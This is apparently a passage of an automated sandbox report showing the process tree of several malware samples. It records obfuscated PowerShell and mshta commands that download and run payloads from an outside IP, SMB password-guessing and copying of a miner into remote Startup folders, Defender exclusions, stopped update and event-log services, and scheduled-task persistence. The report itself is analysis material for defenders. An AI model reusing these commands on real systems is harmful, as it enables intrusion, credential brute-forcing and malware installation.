C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:7416 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:8404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:9604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:9448
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:7032
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:1492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:9068 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:2496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:4240
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:10136
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "6⤵PID:7380
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"7⤵
- Enumerates system info in registry
PID:9992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:7728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "6⤵PID:7860
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵PID:8340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "6⤵
- System Location Discovery: System Language Discovery
PID:8428 -
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"7⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:9384
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"6⤵
- System Location Discovery: System Language Discovery
PID:7576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\136.243.76.21\Users\1\IMG001.exe" "6⤵PID:9860
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\136.243.76.21\Users\1\IMG001.exe"7⤵
- Enumerates system info in registry
PID:5176
-
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users /delete /y6⤵
- Indicator Removal: Network Share Connection Removal
PID:7888
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7212
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8072
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "1" /user:"1"6⤵
- System Location Discovery: System Language Discovery
PID:5816
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "1" /user:"1"6⤵PID:9976
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:8736
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "123" /user:"1"6⤵PID:5916
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "123" /user:"1"6⤵PID:10648
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10692
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "1" /user:"1"6⤵PID:9268
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "1" /user:"1"6⤵PID:10844
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11136
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "0205" /user:"1"6⤵PID:9600
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "0205" /user:"1"6⤵PID:10052
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3664
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ """" /user:"1"6⤵PID:10712
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users """" /user:"1"6⤵PID:10536
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10776
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "0" /user:"136.243.76.21"6⤵PID:5416
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "0" /user:"136.243.76.21"6⤵PID:10572
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11200
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "1" /user:"136.243.76.21"6⤵PID:10752
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "1" /user:"136.243.76.21"6⤵PID:11212
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7852
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "123" /user:"136.243.76.21"6⤵PID:10828
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "123" /user:"136.243.76.21"6⤵PID:10892
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10584
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "136.243.76.21" /user:"136.243.76.21"6⤵PID:10716
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "136.243.76.21" /user:"136.243.76.21"6⤵PID:10424
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10992
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "0205" /user:"136.243.76.21"6⤵PID:6276
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "0205" /user:"136.243.76.21"6⤵PID:5416
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10056
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ """" /user:"136.243.76.21"6⤵PID:10700
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users """" /user:"136.243.76.21"6⤵PID:5588
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9944
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "0" /user:"administrator"6⤵PID:8892
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\Users "0" /user:"administrator"6⤵PID:4588
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10948
-
-
C:\Windows\SysWOW64\net.exenet use \\136.243.76.21\C$ "1" /user:"administrator"6⤵PID:10088
-
-
-
-
-
C:\Users\Admin\Desktop\a\rh.exe"C:\Users\Admin\Desktop\a\rh.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 6204⤵
- Program crash
PID:5940
-
-
-
C:\Users\Admin\Desktop\a\file.exe"C:\Users\Admin\Desktop\a\file.exe"3⤵PID:1276
-
C:\Windows\SYSTEM32\wscript.exe"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js4⤵
- Checks computer location settings
PID:4044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:7428 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\CMD.vbs"6⤵
- Checks computer location settings
PID:2484 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c mshta http://176.113.115.178/Windows-Update7⤵PID:320
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:7448
-
-
C:\Windows\system32\mshta.exemshta http://176.113.115.178/Windows-Update8⤵
- Blocklisted process makes network request
- Checks computer location settings
PID:8020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X9⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\10⤵
- Command and Scripting Interpreter: PowerShell
PID:7200
-
-
C:\Users\Admin\AppData\Roaming\LB31.exe"C:\Users\Admin\AppData\Roaming\LB31.exe"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:6660 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force11⤵
- Command and Scripting Interpreter: PowerShell
PID:8072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart11⤵PID:4328
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart12⤵PID:5236
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc11⤵
- Launches sc.exe
PID:6536
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc11⤵
- Launches sc.exe
PID:5356
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv11⤵
- Launches sc.exe
PID:6644
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits11⤵
- Launches sc.exe
PID:6672
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc11⤵
- Launches sc.exe
PID:7760
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 011⤵
- Power Settings
PID:7272
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 011⤵
- Power Settings
PID:3428
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 011⤵
- Power Settings
PID:7968
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 011⤵
- Power Settings
PID:5296
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe11⤵PID:7080
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "LIB"11⤵
- Launches sc.exe
PID:5936
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "LIB" binpath= "C:\ProgramData\Mig\Mig.exe" start= "auto"11⤵
- Launches sc.exe
PID:7556
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog11⤵
- Launches sc.exe
PID:5916
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "LIB"11⤵
- Launches sc.exe
PID:6624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:4600
-
-
-
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:8140
-
-
-
-
C:\Users\Admin\Desktop\a\L.exe"C:\Users\Admin\Desktop\a\L.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7468
-
-
C:\Users\Admin\Desktop\a\ttl.exe"C:\Users\Admin\Desktop\a\ttl.exe"3⤵PID:9048
-
-
C:\Users\Admin\Desktop\a\caspol.exe"C:\Users\Admin\Desktop\a\caspol.exe"3⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
PID:3152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\caspol.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:9912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:9940
-
-
-
C:\Users\Admin\Desktop\a\caspol.exe"C:\Users\Admin\Desktop\a\caspol.exe"4⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:9928
-
-
-
-
C:\Users\Admin\Desktop\4363463463464363463463463.exe"C:\Users\Admin\Desktop\4363463463464363463463463.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2232
-
-
C:\Users\Admin\Desktop\Files\built.exe"C:\Users\Admin\Desktop\Files\built.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\built.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:3636
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4384 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:2640
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cjlDDzoa4tYZ.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:3840
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3388
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:640 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:2304
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RW4i2n0v4jZt.bat" "7⤵PID:2096
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:1936
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4208
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4384 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nZRwf4i3gbqv.bat" "9⤵PID:2992
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:4500
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1212
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4268 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:3708
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3ufjDrYsMBh2.bat" "11⤵PID:824
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:1044
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4428
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:992 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:4804
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qJmll3zvJ2Zb.bat" "13⤵PID:892
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:3724
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3636
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:4224
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pqGYxp582ui4.bat" "15⤵PID:2076
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3328
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4308
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WRW3jUfKERoW.bat" "17⤵PID:4428
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:444
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4868
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1316 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:3024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6vc0q3VbwkxW.bat" "19⤵PID:884
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:2624
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1492
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1324 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:548
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PdwGGa0lF9fa.bat" "21⤵PID:2644
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:2820
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:892
-
-
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
PID:5004 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:3592
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1SiI4Zkx6p69.bat" "23⤵PID:3328
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:4988
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1792
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"C:\Users\Admin\Desktop\Files\9758xBqgE1azKnB.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1432 -
